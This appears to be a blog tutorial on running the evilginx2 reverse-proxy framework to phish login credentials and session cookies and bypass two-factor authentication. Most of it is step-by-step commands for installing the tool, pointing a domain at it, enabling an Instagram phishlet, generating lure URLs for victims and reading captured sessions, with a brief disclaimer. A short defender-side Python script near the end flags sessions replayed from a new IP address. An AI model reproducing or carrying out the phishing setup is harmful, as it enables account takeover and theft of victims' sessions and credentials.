
How Hackers Bypass Two-Factor Authentication in Phishing Attacks Using Evilginx2

 

What Is Modern Phishing and How Is It Different from Traditional Phishing?


Although most security analysts and experts do not believe phishing or other social engineering attacks to be a danger to an organization, this is not always the case. Internal factors, in addition to known exploits, zero-day vulnerabilities, and security misconfigurations, render businesses vulnerable to attacks. One such method is the well-known phishing attack, in which an attacker sends a victim the URL of an attacker-hosted application that imitates the login page of a popular legitimate web application, in the hope that the victim will enter their credentials. But wait a minute, don't popular applications like Facebook and Google have two-factor authentication?

They do, but there are currently techniques to bypass it, one of which is modern phishing, which renders two-factor authentication ineffective. When apps use two-factor authentication techniques like OTP or Microsoft Authenticator, simply gaining an ID and a password from an attack isn't enough. There are a number of tools available that promise to execute modern phishing attacks, but let's focus on a well-known open-source tool, evilginx2.


How Evilginx2 Helps, and Everything About It

Evilginx2 is a man-in-the-middle attack framework that can be used to phish login credentials as well as session cookies, allowing two-factor authentication protection to be bypassed. But before we get into its setup, let me warn you that the knowledge you gain must never be used to inflict harm on an individual or an organization, and if that happens, neither we (thedecentshub) nor evilginx2 will be held liable.

Let us begin. As a prerequisite, you must have a Linux-based operating system or environment, such as Kali, Unix, Parrot, and so on, installed on WSL or in a VM. Now install evilginx2 globally by running the commands listed below one by one.

sudo apt-get -y install git make
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo make install
sudo evilginx


Now that you have installed the tool, and assuming you have also set up a domain (for example, attacker.com) that points to your server at IP address 10.10.10.10, let's begin with the crazy and most amazing part. Configure the tool for your domain and server using the commands below.

config domain attacker.com
config ip 10.10.10.10


Phishlets are an essential part of evilginx2. These are YAML files that contain the per-application configuration for creating a phishing website. For the time being, Evilginx2 includes 20 phishlets by default for apps such as Amazon, Instagram, PayPal, and others. However, this does not limit you; you may construct your own YAML file for websites that are not on the list. This is super easy, but I'll go into more detail in another blog. Until then, every time evilginx2 is loaded, you can see all of your default phishlets.

Now, use the command below to enable the phishlet you wish to utilize. If no SSL/TLS certificate is detected for the host, it will immediately retrieve one.

phishlets enable instagram


Now that your new application is up, use the commands below to configure a redirect URL for successful logins and obtain the URL you need to share with your victim users.

lures create instagram
lures edit 0 redirect_url https://www.instagram.com
lures get-url 0

Distribute the URL and monitor the reaction in evilginx2. To examine all cookies and credentials gathered so far, use the command "sessions". Use "sessions <id>" to get more detail on a single session. The cookies obtained can be used to acquire unrestricted access to the victim's account. Evilginx2 performs its duties efficiently, making every effort to keep the target unaware of the attack that is taking place behind their back.
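A defender-side check for the cookie replay described above, as an added example that is not part of the original post or of evilginx2: it scans application log events and flags any session later used from an IP address other than the one that completed the login. The log format, field names and sample values are assumptions constructed for illustration; 10.10.10.10 is reused from the example server address above.

```python
import json

# Constructed sample events (JSON lines), not real data. The field names
# (ts, session, ip, ua, event) are assumptions made for this example.
SAMPLE_LOG = """
{"ts": "10:00:02", "session": "s-alice", "ip": "10.10.10.10", "ua": "Chrome/124 Windows", "event": "login_mfa_ok"}
{"ts": "10:00:05", "session": "s-bob", "ip": "198.51.100.20", "ua": "Safari/17 macOS", "event": "login_mfa_ok"}
{"ts": "10:01:30", "session": "s-bob", "ip": "198.51.100.20", "ua": "Safari/17 macOS", "event": "request"}
{"ts": "10:04:11", "session": "s-alice", "ip": "203.0.113.7", "ua": "Firefox/125 Linux", "event": "request"}
{"ts": "10:06:40", "session": "s-carol", "ip": "198.51.100.30", "ua": "Chrome/124 Android", "event": "login_mfa_ok"}
{"ts": "10:20:09", "session": "s-carol", "ip": "198.51.100.99", "ua": "Chrome/124 Android", "event": "request"}
"""


def find_replayed_sessions(log_text):
    """Flag sessions later used from an IP that did not complete the login."""
    origin = {}    # session id -> (ip, ua) recorded when MFA succeeded
    findings = {}  # session id -> first finding for that session
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        sid, client = ev["session"], (ev["ip"], ev["ua"])
        if ev["event"] == "login_mfa_ok":
            origin[sid] = client
            continue
        first = origin.get(sid)
        if first is None or sid in findings or client[0] == first[0]:
            continue
        # IP and User-Agent both changed: strong sign of a cookie imported into
        # another browser. IP alone changed: may be a network switch, so medium.
        severity = "high" if client[1] != first[1] else "medium"
        findings[sid] = {"session": sid, "login_ip": first[0],
                         "replay_ip": client[0], "ts": ev["ts"],
                         "severity": severity}
    return list(findings.values())


if __name__ == "__main__":
    for finding in find_replayed_sessions(SAMPLE_LOG):
        print(finding)
```

A finding is a signal to revoke the session and require the user to authenticate again.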

Note: While Evilginx2 is running, it grabs cookies and executes the phishlets. If the session is interrupted, the phishlet stops operating. If you need to keep your application running while your secure shell is closed, utilize a screen or tmux session.

If you are stuck with your setup, need a solution, want more clarification on any topic, want to show us support, or just want to give us a suggestion, drop us a comment down below or reach us by email. Keep a watch out for our new blog, and until then, have a good life. Bye.


